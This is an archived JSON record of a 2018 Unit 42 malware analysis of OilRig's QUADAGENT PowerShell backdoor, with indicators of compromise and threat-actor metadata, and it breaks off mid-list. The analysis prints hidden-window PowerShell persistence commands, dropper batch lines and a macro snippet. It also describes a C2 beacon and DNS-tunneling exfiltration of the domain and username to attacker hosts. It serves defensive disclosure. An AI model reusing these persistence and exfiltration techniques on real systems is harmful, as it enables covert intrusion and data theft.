{
	"id": "e39296d3-8953-4123-bbd0-3c0fb1bdb26b",
	"created_at": "2026-04-06T00:21:11.915557Z",
	"updated_at": "2026-04-10T03:37:50.599108Z",
	"deleted_at": null,
	"sha1_hash": "85717db1d1ee235746fab628aecc468a0ca8cd8a",
	"title": "OilRig Targets Technology Service Provider and Government Agency with QUADAGENT",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 602562,
	"plain_text": "OilRig Targets Technology Service Provider and Government Agency with QUADAGENT\r\nBy Bryan Lee, Robert Falcone\r\nPublished: 2018-07-25 · Archived: 2026-04-05 13:00:30 UTC\r\nThe OilRig group continues to adapt their tactics and bolster their toolset with newly developed tools. The OilRig group (AKA APT34, Helix Kitten) is an adversary motivated by espionage, primarily operating in the Middle East region. We first discovered this group in mid-2016, although it is possible their operations extend earlier than that time frame. They have shown themselves to be an extremely persistent adversary that shows no signs of slowing down. Examining their past behaviors alongside current events only seems to indicate that the OilRig group’s operations are likely to accelerate even further in the near future.\r\nBetween May and June 2018, Unit 42 observed multiple attacks by the OilRig group appearing to originate from a government agency in the Middle East. Based on previously observed tactics, it is highly likely the OilRig group leveraged credential harvesting and compromised accounts to use the government agency as a launching platform for their true attacks. The targets in these attacks included a technology services provider as well as another government entity. Both these targets were in the same nation-state. Further, the attacks against these targets were made to appear to have originated from other entities in the same country. However, the actual attackers themselves were outside this country and likely used stolen credentials from the intermediary organization to carry out their attacks.\r\nThe attacks delivered a PowerShell backdoor called QUADAGENT, a tool attributed to the OilRig group by both ClearSky Cyber Security and FireEye. 
In our own analysis, we were also able to confirm the attribution of this tool to the OilRig group by examining specific artifacts that were reused from tools previously used by the OilRig group, in addition to tactics reused from previous attacks. The use of script-based backdoors is a common technique used by the OilRig group, as we have previously documented. However, packaging these scripts into a portable executable (PE) file is not a tactic we have seen the OilRig group use frequently. Detailed analysis of QUADAGENT and its ties to OilRig is in the appendix at the end of this blog. QUADAGENT is the 12th custom-built tool that Unit 42 has documented the OilRig group using for their attacks.\r\nOur analysis revealed the two QUADAGENT PE files we obtained were slightly different from each other. Primarily, one used a Microsoft .NET Framework-based dropper that also opens a decoy dialog box, which can be seen in Figure 1. The other sample was a PE file generated via a bat2exe tool.\r\nSHA256 | Filename | PowerShell Filename | Va\r\n5f001f3387ddfc0314446d0c950da2cec4c786e2374d42beb3acce6883bb4e63 | \u003credacted\u003e Technical Services.exe | Office365DCOMCheck.ps1 | B\r\nd948d5b3702e140ef5b9247d26797b6dcdfe4fdb6f367bb217bc6b5fc79df520 | tafahom.exe, Sales Modification.exe | SystemDiskClean.ps1 | .N\r\nTable 1. QUADAGENT PE Files\r\nThe QUADAGENT backdoors dropped onto the hosts were nearly identical to each other, with the only differences being the command and control server (C2) and randomized obfuscation. We were also able to locate a third delivery package of the QUADAGENT backdoor as reported by ClearSky Cyber Security. 
In their example, the OilRig group used a malicious macro document to deliver the backdoor, which is a tactic much more commonly used by them.\r\nA closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples was likely the result of using an open-source toolkit called Invoke-Obfuscation. This tool was originally intended to aid defenders in simulating obfuscated PowerShell commands to better their defenses. Invoke-Obfuscation has proven to be highly effective at obfuscating PowerShell scripts and, in this case, the adversary was able to take advantage of the tool for increased chances of evasion and as an anti-analysis tactic.\r\nhttps://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/\r\nPage 1 of 9\r\nAttack Details\r\nThis latest attack consisted of three waves between May and June 2018. All three waves involved a single spear phishing email that appeared to originate from a government agency based in the Middle East. Based on our telemetry, we have high confidence the email account used to launch this attack was compromised by the OilRig group, likely via credential theft.\r\nIn the two waves (May 30 and June 3) against the technology services provider, the victim email addresses were not easily discoverable via common search engines, indicating the targets were likely part of a previously collected target list, or possibly known associates of the compromised account used to send the attack emails. The malicious attachment was a simple PE file (SHA256: 5f001f3387ddfc0314446d0c950da2cec4c786e2374d42beb3acce6883bb4e63) with the filename \u003credacted\u003e Technical Services.exe. The file appears to have been compiled using a bat2exe tool, which will take batch files (.bat) and convert them to PE (.exe) files. 
Its sole purpose here is to install the QUADAGENT backdoor and execute it.\r\nOnce the victim downloads and executes the email attachment, it runs silently with no additional decoy documents or decoy dialog boxes. The executable will drop the packaged QUADAGENT PowerShell script using the filename Office365DCOMCheck.ps1, in addition to a VBScript file with the same filename which will assist in its execution. A scheduled task is also generated to maintain persistence of the payload. Once the QUADAGENT payload has executed, it will use rdppath[.]com as the C2, first via HTTPS, then HTTP, then via DNS tunneling, each being used as a corresponding fallback channel if the former fails.\r\nThe wave against the government entity (June 26) also involved a simple PE file attachment (SHA256: d948d5b3702e140ef5b9247d26797b6dcdfe4fdb6f367bb217bc6b5fc79df520) using the filename tafahom.exe. This PE was slightly different from the other attack, being compiled using the Microsoft .NET Framework instead of being generated via a bat2exe tool, and containing a decoy dialog box as shown in Figure 1.\r\nFigure 1. Decoy dialog box\r\nThe tactic of using a decoy dialog box is commonly used by multiple adversaries and is generally deployed as a method to reduce suspicion by the victim. In comparison to being silently run, a victim may be less suspicious of a dialog/error message because they are provided what appears to be a legitimate error response when attempting to open the attachment. When a file is silently run, because there is no response to the user’s action, a victim may be more suspicious or curious about what actually happened.\r\nAfter the .NET PE file has been run, we observed the same behavior as the above QUADAGENT sample of dropping a PowerShell script with the filename SystemDiskClean.ps1 alongside a VBScript file with the same name. 
The C2 techniques remained identical, with the only change being the server, which became cpuproc[.]com.\r\nUsing rdppath[.]com as a pivot point, we collected an additional QUADAGENT sample also communicating to this C2 (SHA256: d7130e42663e95d23c547d57e55099c239fa249ce3f6537b7f2a8033f3aa73de), which was first reported by ClearSky Cyber Security. In contrast to the two samples used in these attacks, this one did not use a PE attachment, and instead used a Microsoft Word document containing a malicious macro as the delivery vehicle. The use of malicious macro delivery documents is a tactic we have observed the OilRig group use repeatedly over the three years we’ve been tracking them. The actual QUADAGENT script payload used in the ClearSky sample was exactly the same as the one we found in the bat2exe version used against the aforementioned technical services provider. The delivery document also used a filename that could be related to other technology services or media organizations within that same nation state, although it is inconclusive. The document also contained a lure image, similar to ones commonly found in malicious macro documents which ask the user to click on “Enable Content”, as seen in Figure 2. Unlike many other delivery documents used by this group, there was no additional decoy content after the macro was enabled.\r\nFigure 2. Lure image used to entice users to enable macros\r\nUse of Open Source Tools\r\nIn an attempt to avoid detection and as an anti-analysis tactic, the OilRig group abused an open source tool called Invoke-Obfuscation to obfuscate the code used for QUADAGENT. 
Invoke-Obfuscation is freely available via a GitHub repository and allows a user to change the visual representation of a PowerShell script simply by selecting the desired obfuscation techniques. Invoke-Obfuscation offers a variety of obfuscation techniques, and by analyzing the script we were able to ascertain the specific options used in this attack. After identifying the specific options used to obfuscate QUADAGENT, we were able to deobfuscate the PowerShell script and perform additional analysis.\r\nWe found two obfuscation techniques applied to the script: the first one changing the representation of variables; the second one changing the representation of strings in the script.\r\nInvoke-Obfuscation calls the variable obfuscation technique used by the actors to obfuscate this script Random Case + {} + Ticks, which changes all variables in the script to have randomly cased characters, to be surrounded in curly braces and to include the tick (`) character, which is ignored by PowerShell. Invoke-Obfuscation calls the string obfuscation used by the actors to further obfuscate this script Reorder, which uses the string formatting functionality within PowerShell to reconstruct strings from out-of-order substrings (ex. \"{1}{0}\" -f 'bar','foo').\r\nDuring our analysis, we installed Invoke-Obfuscation and used it to obfuscate a previously collected QUADAGENT sample to confirm our analysis. We used the two previously mentioned obfuscation options within Invoke-Obfuscation on this QUADAGENT sample, which resulted in the generation of a script very similar to the Office365DCOMCheck.ps1 and SystemDiskClean.ps1 payloads delivered in the attacks discussed in this blog. 
We captured the commands we ran in Invoke-Obfuscation in the animation in Figure 3 below, which visualizes the steps the threat actor may have taken to create the payload delivered in this attack.\r\nFigure 3. Possible steps carried out in Invoke-Obfuscation on the QUADAGENT sample\r\nConclusion\r\nThe OilRig group continues to be a persistent adversary group in the Middle East region. While their delivery techniques are fairly simple, the various tools we have attributed as part of their arsenal reveal sophistication. In this instance, they illustrated a typical behavior of adversary groups, wherein the same tool was reused in multiple attacks, but each had enough modifications via infrastructure change, additional obfuscation, and repackaging that each sample may appear different enough to bypass security controls. A key point to always remember is that these types of adversary groups will follow the path of least resistance in their attacks, as long as their mission directive is accomplished.\r\nPalo Alto Networks customers may learn more and are protected via the following ways:\r\nWildFire classifies QUADAGENT samples as malicious\r\nQUADAGENT C2 Domains have been classified as malicious\r\nAutoFocus customers can track QUADAGENT via its corresponding tag\r\nIOCs\r\nSHA256 Hashes\r\nQUADAGENT\r\nd948d5b3702e140ef5b9247d26797b6dcdfe4fdb6f367bb217bc6b5fc79df520\r\nd7130e42663e95d23c547d57e55099c239fa249ce3f6537b7f2a8033f3aa73de\r\n5f001f3387ddfc0314446d0c950da2cec4c786e2374d42beb3acce6883bb4e63\r\nThreeDollars\r\n1f6369b42a76d02f32558912b57ede4f5ff0a90b18d3b96a4fe24120fa2c300c\r\n119c64a8b35bd626b3ea5f630d533b2e0e7852a4c59694125ff08f9965b5f9cc\r\n
Domains\r\nrdppath[.]com\r\ncpuproc[.]com\r\nacrobatverify[.]com\r\nFilenames\r\nOffice365DCOMCheck.ps1\r\nOffice365DCOMCheck.vbs\r\nSystemDiskClean.ps1\r\nSystemDiskClean.vbs\r\nAdobeAcrobatLicenseVerify.ps1\r\nc:\\Users\\\u003cusername\u003e\\AppData\\Roaming\\Out.jpg\r\nAppendix\r\nQUADAGENT Relationship to Other OilRig Tools\r\nDuring our regular data gathering functions several months ago, we collected a delivery document (SHA256: 1f6369b42a76d02f32558912b57ede4f5ff0a90b18d3b96a4fe24120fa2c300c) that contained an at-the-time unknown payload which would be revealed to be QUADAGENT. While we do not have data supporting targeting information or telemetry, we know the document was created in January 2018 and likely used in an attack around that time frame. In addition, the delivery document shared metadata artifacts with the ThreeDollars delivery document (SHA256: 119c64a8b35bd626b3ea5f630d533b2e0e7852a4c59694125ff08f9965b5f9cc) that OilRig used to deliver the ISMAgent payload in a targeted attack in January 2018 on a government entity in the Middle East.\r\nThe QUADAGENT payload dropped by the delivery document had the filename AdobeAcrobatLicenseVerify.ps1 and used acrobatverify[.]com for its C2. Examining the subdomains for acrobatverify[.]com reveals three subdomains: www, resolve, and dns. The passive DNS data for the subdomains shows an IP resolution of 185.162.235[.]121 from December 2017 through January 2018. Prior to this time period, we see several subdomains of msoffice-cdn[.]com (ns1, ns2, and www) also resolving to this IP. This IP and msoffice-cdn[.]com were both previously referenced in our first report on an OilRig attack using the ThreeDollars delivery document.\r\nWe used this QUADAGENT payload when testing the Invoke-Obfuscation tool mentioned in this blog. 
By applying two specific obfuscation techniques within Invoke-Obfuscation, we were able to create an obfuscated PowerShell script that was very similar to the QUADAGENT payloads delivered in the attacks discussed in this blog.\r\nQUADAGENT Analysis\r\nThe final payload delivered in all three attack waves is a PowerShell downloader referred to by other research organizations as QUADAGENT. The downloaders in these attacks were configured to use both rdppath[.]com and cpuproc[.]com as their C2 servers. When communicating with its C2 server, the downloaders use multiple protocols, specifically HTTPS, HTTP or DNS, each of which provides a fallback channel in that order. For instance, the downloader will first attempt to communicate with its C2 server using an HTTPS request. If that HTTPS request is not successful, the downloader will issue an HTTP request. Lastly, if the HTTP request is not successful, the downloader will fall back to using DNS tunneling to establish communications. We provide more on the specific usage of these protocols as we discuss the inner workings of this malware in this section.\r\nThe downloader will use the filename of the script (ex. Office365DCOMCheck or SystemDiskClean) as the name for the scheduled task to maintain persistence on the victim host. To create the scheduled task, the PowerShell payload starts by writing the following to a VBScript file with the same name as the task name (ex. Office365DCOMCheck.vbs or SystemDiskClean.vbs) within the %TEMP% folder:\r\nCreateObject(\"WScript.Shell\").Run \"\" \u0026 WScript.Arguments(0) \u0026 \"\", 0, False\r\nThe scheduled task will then run every five minutes, which provides persistent execution of the downloader script. The task itself is fairly simple, calling the VBScript file with a PowerShell one-liner as an argument to run the QUADAGENT payload (ex. 
Office365DCOMCheck.ps1 and SystemDiskClean.ps1):\r\nwscript.exe \"Office365DCOMCheck.vbs\" \\\"PowerShell.exe  -ExecutionPolicy bypass -WindowStyle hidden -NoProfile '\u003ccurrent PowerShell script\u003e'  \\\"\r\nAfter setting up persistent access, the payload checks to see if a value exists within a registry key in the HKCU hive whose name is the same as the scheduled task (ex. Office365DCOMCheck or SystemDiskClean), such as the following:\r\nHKCU\\Office365DCOMCheck\r\nThe payload uses this registry key to store a session identifier unique to the compromised system, as well as a pre-shared key used for encrypting and decrypting communications between the system and the C2 server. This registry key is empty upon the first execution of the payload. The payload will communicate with its C2 server to obtain the session ID and pre-shared key and write them to this registry key in the following format:\r\n\u003csession id\u003e_\u003cpre-shared key\u003e\r\nTo obtain the session ID and pre-shared key, the payload will first try to contact the C2 via an HTTPS GET request to the following URL:\r\nhxxps://www.rdppath[.]com/\r\nIf the above request using HTTPS does not result in an HTTP 200 OK message, or the response data has no alphanumeric characters, the code will attempt to communicate with the C2 server using HTTP via the following URL:\r\nhxxp://www.rdppath[.]com/\r\nThe code to communicate with the C2 via HTTP exists within an exception handler. To trigger this, if the HTTPS requests do not work, the payload deliberately causes an exception by dividing 1 by 0. 
This exception invokes the exception handler containing the HTTP communication code, allowing it to run.\r\nIf either attempt is successful, the C2 server will respond with the session ID and a pre-shared key in cleartext, which the payload will save to the previously mentioned registry key. The C2 server will provide the pre-shared key within the response data and will provide the session ID value via the Set-Cookie field within the response, specifically the string after the PHPSESSID parameter of the cookie.\r\nIf both attempts fail and the payload is unable to obtain a session ID and pre-shared key via HTTP or HTTPS, it will try to use DNS tunneling. To obtain the session ID and pre-shared key, the payload will issue a query to resolve the following domain:\r\nmail.\u003crandom number between 100000 and 999999\u003e.\u003cc2 name\u003e\r\nThis request notifies the C2 server that the payload is about to send system specific data as part of the initial handshake. The script gathers system specific data, such as the domain the system belongs to and the current username, which it constructs in the following format:\r\n\u003cdomain\u003e\\\u003cusername\u003e:pass\r\nThe above string is encoded using a custom base64 encoder that strips out the non-alphanumeric characters (=, / and +) from the data and replaces them with domain-safe values (01, 02 and 03 respectively). The encoded string is then sent in a query to resolve the following domain:\r\n\u003cencoded system data\u003e.\u003csame random number between 100000 and 999999 above\u003e.\u003cc2 name\u003e\r\nAfter obtaining a session ID and pre-shared key, the PowerShell script will continue to communicate with its C2 server to obtain data to treat as a command. 
The script will first attempt to communicate with the C2 server using HTTPS (HTTP if unsuccessful), which involves GET requests using the session ID within the request's cookie in the PHPSESSID field, as seen in the example GET request:\r\nGET / HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246\r\nHost: www.rdppath[.]com\r\nCookie: PHPSESSID=\u003cc2 provided session id\u003e\r\nConnection: Keep-Alive\r\nIf the payload is unable to reach the C2 via HTTPS/HTTP, the payload yet again falls back to DNS tunneling. The payload will issue a DNS query to the following domain to notify the C2 that it is about to send data (the session ID value) in a subsequent query:\r\nns1.\u003crandom number between 100000 and 999999\u003e.\u003cc2 name\u003e\r\nThe payload does nothing with the C2 server’s response to the query. 
Instead, it immediately issues a query to resolve the following domain, which embeds the session ID value to transmit it to the C2:\r\n\u003cencoded session id\u003e.\u003csame random number between 100000 and 999999\u003e.\u003cc2 domain name\u003e\r\nTo transmit the data via DNS tunneling, the C2 server will respond to the above query with an IPv6 address that contains the number of DNS queries the payload must issue to obtain the entirety of the data from subsequent IPv6 answers. The script will send the specified number of DNS queries using the following format, to each of which the C2 will respond with an IPv6 address that the script will treat as a string of data:\r\nwww.\u003csequence number\u003e.\u003csame random number between 100000 and 999999\u003e.\u003cc2 domain name\u003e\r\nThe payload will treat the data provided by the C2 as a message, which will have the following structure:\r\nhello\u003cchar uuid[35]\u003e\u003cchar type[1]\u003e\u003cdata\u003e\r\nThe message will start with the string hello followed by a 35-character UUID string. The type field specifies the command that the payload will handle. This specific variant of the payload can only handle one command type, x. The data field within the message is a string of custom base64 encoded data that the malware decodes using the same custom base64 routine mentioned earlier and decrypts using AES and the pre-shared key. The x command treats the supplied data as a PowerShell script that it will write to the current PowerShell script (Office365DCOMCheck.ps1/SystemDiskClean.ps1), effectively overwriting the initial PowerShell script with a secondary payload script. Also, the x command will delete the generated registry key and the Office365DCOMCheck/SystemDiskClean scheduled task. 
It will run the newly downloaded PowerShell script by running the following command via cmd /c:\r\nwscript.exe \"Office365DCOMCheck.vbs\" \"PowerShell.exe -ExecutionPolicy bypass -WindowStyle hidden -NoProfile \u003cpath to Office365DCOMCheck.ps1 script\u003e\"\r\nThe payload will then notify the C2 that it has successfully downloaded and executed the secondary PowerShell payload. It does so using either the HTTPS/HTTP or DNS channels, depending on which method is successful. The payload will construct a message with the following structure, which it will then send to the C2:\r\nbye\u003cchar uuid[35]\u003ed\r\nThe message above is sent via a simple HTTPS/HTTP POST request to the C2 server. If that fails, the payload will use DNS tunneling by first issuing a DNS query to resolve the following domain to notify the C2 that the payload will send data to it in subsequent DNS queries:\r\nns1.\u003crandom number between 100000 and 999999\u003e.\u003cc2 name\u003e\r\nThe payload will then split the message up into 60-byte chunks (only 1 in this case), which it will send to the C2 via DNS queries to resolve domains structured as:\r\n\u003cencoded/encrypted data of message\u003e.\u003csame random number between 100000 and 999999\u003e.\u003cc2 name\u003e\r\nThe payload will notify the C2 that it is done sending data by issuing a DNS query to resolve a domain structured as:\r\nns2.\u003csame random number between 100000 and 999999\u003e.\u003cc2 name\u003e\r\nPackage Comparison of the QUADAGENT Samples\r\nThe bat2exe version (SHA256: 5f001f3387ddfc0314446d0c950da2cec4c786e2374d42beb3acce6883bb4e63) has a batch script, PowerShell script, and associated file names embedded within several resources that it will decrypt using RC4 and various MD5 hashes for keys. 
The executable obtains an embedded PowerShell script, decrypts it using RC4, then decompresses it using ZLIB, and saves the cleartext to C:\\Users\\\u003cusername\u003e\\AppData\\Roaming\\Out.jpg. The batch script will then rename Out.jpg to Office365DCOMCheck.ps1 and execute it with the following commands:\r\n@shift /0\r\nrename Out.jpg Office365DCOMCheck.ps1\r\nPowerShell -exec bypass -File .\\Office365DCOMCheck.ps1\r\nThe .NET variant (SHA256: d948d5b3702e140ef5b9247d26797b6dcdfe4fdb6f367bb217bc6b5fc79df520) is even simpler. This dropper starts by displaying the dialog box previously shown and discussed in Figure 1, using the following command:\r\nInteraction.MsgBox(\"An error occurred while processing your request. code(2343)\", MsgBoxStyle.Critical, null);\r\nThe dropper then writes the content of the payload, which resides as plaintext in a resource within the .NET assembly, to C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Temp\\SystemDiskClean.ps1. It will then execute it as a shell object:\r\ncmd.exe /c powershell -exec bypass -file \"C:\\Users\\Administrator\\AppData\\Local\\Temp\\SystemDiskClean.ps1\"\r\nIn the malicious macro attack, the same Office365DCOMCheck.ps1 script that was used in the PE version is used as the payload. When the document is opened, a lure image as seen in Figure 2 is displayed in an attempt to coerce the victim to enable macros.\r\nWhen macros are enabled and run, the macro within the Word document searches the sections of the document to get the contents of the header using the following piece of code:\r\nSet rng = ActiveDocument.Sections(intSection).Headers(1).Range\r\nThe code above obtains the contents of the header, which the macro will write to a file at C:\\programdata\\Office365DCOMCheck.ps1. 
The creator of the delivery document was able to visually hide the PowerShell script in the header by setting the text to a font size of 2 and font color of white, as seen in Figure 4.\r\nFigure 4. Hidden PowerShell script within the document's header using a small white font\r\nThis technique of hiding malicious content by using a small white font is not unique to this threat group, as we recently observed the Sofacy group use this technique to hide DDE instructions within one of their delivery documents.\r\nSource: https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/"
	],
	"report_names": [
		"unit42-oilrig-targets-technology-service-provider-government-agency-quadagent"
	],
	"threat_actors": [
		{
			"id": "ce10c1bd-4467-45f9-af83-28fc88e35ca4",
			"created_at": "2022-10-25T15:50:23.458833Z",
			"updated_at": "2026-04-10T02:00:05.419537Z",
			"deleted_at": null,
			"main_name": "APT34",
			"aliases": null,
			"source_name": "MITRE:APT34",
			"tools": [
				"netstat",
				"Systeminfo",
				"PsExec",
				"SEASHARPEE",
				"Tasklist",
				"Mimikatz",
				"POWRUNER",
				"certutil"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f8dddd06-da24-4184-9e24-4c22bdd1cbbf",
			"created_at": "2023-01-06T13:46:38.626906Z",
			"updated_at": "2026-04-10T02:00:03.043681Z",
			"deleted_at": null,
			"main_name": "Tick",
			"aliases": [
				"G0060",
				"Stalker Taurus",
				"PLA Unit 61419",
				"Swirl Typhoon",
				"Nian",
				"BRONZE BUTLER",
				"REDBALDKNIGHT",
				"STALKER PANDA"
			],
			"source_name": "MISPGALAXY:Tick",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "cffb3c01-038f-4527-9cfd-57ad5a035c22",
			"created_at": "2022-10-25T15:50:23.38055Z",
			"updated_at": "2026-04-10T02:00:05.258283Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"COBALT GYPSY",
				"IRN2",
				"APT34",
				"Helix Kitten",
				"Evasive Serpens",
				"Hazel Sandstorm",
				"EUROPIUM",
				"ITG13",
				"Earth Simnavaz",
				"Crambus",
				"TA452"
			],
			"source_name": "MITRE:OilRig",
			"tools": [
				"ISMInjector",
				"ODAgent",
				"RDAT",
				"Systeminfo",
				"QUADAGENT",
				"OopsIE",
				"ngrok",
				"Tasklist",
				"certutil",
				"ZeroCleare",
				"POWRUNER",
				"netstat",
				"Solar",
				"ipconfig",
				"LaZagne",
				"BONDUPDATER",
				"SideTwist",
				"OilBooster",
				"SampleCheck5000",
				"PsExec",
				"SEASHARPEE",
				"Mimikatz",
				"PowerExchange",
				"OilCheck",
				"RGDoor",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "67b2c161-5a04-4e3d-8ce7-cce457a4a17b",
			"created_at": "2025-08-07T02:03:24.722093Z",
			"updated_at": "2026-04-10T02:00:03.681914Z",
			"deleted_at": null,
			"main_name": "COBALT EDGEWATER",
			"aliases": [
				"APT34 ",
				"Cold River ",
				"DNSpionage "
			],
			"source_name": "Secureworks:COBALT EDGEWATER",
			"tools": [
				"AgentDrable",
				"DNSpionage",
				"Karkoff",
				"MailDropper",
				"SideTwist",
				"TWOTONE"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "c786e025-c267-40bd-9491-328da70811a5",
			"created_at": "2025-08-07T02:03:24.736817Z",
			"updated_at": "2026-04-10T02:00:03.752071Z",
			"deleted_at": null,
			"main_name": "COBALT GYPSY",
			"aliases": [
				"APT34 ",
				"CHRYSENE ",
				"Crambus ",
				"EUROPIUM ",
				"Hazel Sandstorm ",
				"Helix Kitten ",
				"ITG13 ",
				"OilRig ",
				"Yellow Maero "
			],
			"source_name": "Secureworks:COBALT GYPSY",
			"tools": [
				"Glimpse",
				"Helminth",
				"Jason",
				"MacDownloader",
				"PoisonFrog",
				"RGDoor",
				"ThreeDollars",
				"TinyZbot",
				"Toxocara",
				"Trichuris",
				"TwoFace"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "54e55585-1025-49d2-9de8-90fc7a631f45",
			"created_at": "2025-08-07T02:03:24.563488Z",
			"updated_at": "2026-04-10T02:00:03.715427Z",
			"deleted_at": null,
			"main_name": "BRONZE BUTLER",
			"aliases": [
				"CTG-2006 ",
				"Daserf",
				"Stalker Panda ",
				"Swirl Typhoon ",
				"Tick "
			],
			"source_name": "Secureworks:BRONZE BUTLER",
			"tools": [
				"ABK",
				"BBK",
				"Casper",
				"DGet",
				"Daserf",
				"Datper",
				"Ghostdown",
				"Gofarer",
				"MSGet",
				"Mimikatz",
				"Netboy",
				"RarStar",
				"Screen Capture Tool",
				"ShadowPad",
				"ShadowPy",
				"T-SMB",
				"down_new",
				"gsecdump"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "67709937-2186-4a32-b64c-a5693d40ac77",
			"created_at": "2023-01-06T13:46:38.495593Z",
			"updated_at": "2026-04-10T02:00:02.999196Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"Crambus",
				"Helix Kitten",
				"APT34",
				"IRN2",
				"ATK40",
				"G0049",
				"EUROPIUM",
				"TA452",
				"Twisted Kitten",
				"Cobalt Gypsy",
				"APT 34",
				"Evasive Serpens",
				"Hazel Sandstorm",
				"Earth Simnavaz"
			],
			"source_name": "MISPGALAXY:OilRig",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d4e7cd9a-2290-4f89-a645-85b9a46d004b",
			"created_at": "2022-10-25T16:07:23.419513Z",
			"updated_at": "2026-04-10T02:00:04.591062Z",
			"deleted_at": null,
			"main_name": "Bronze Butler",
			"aliases": [
				"Bronze Butler",
				"CTG-2006",
				"G0060",
				"Operation ENDTRADE",
				"RedBaldNight",
				"Stalker Panda",
				"Stalker Taurus",
				"Swirl Typhoon",
				"TEMP.Tick",
				"Tick"
			],
			"source_name": "ETDA:Bronze Butler",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"9002 RAT",
				"AngryRebel",
				"Blogspot",
				"Daserf",
				"Datper",
				"Elirks",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"HOMEUNIX",
				"HidraQ",
				"HomamDownloader",
				"Homux",
				"Hydraq",
				"Lilith",
				"Lilith RAT",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"Minzen",
				"Moudour",
				"Muirim",
				"Mydoor",
				"Nioupale",
				"PCRat",
				"POISONPLUG.SHADOW",
				"Roarur",
				"RoyalRoad",
				"ShadowPad Winnti",
				"ShadowWali",
				"ShadowWalker",
				"SymonLoader",
				"WCE",
				"Wali",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"XShellGhost",
				"XXMM",
				"gsecdump",
				"rarstar"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
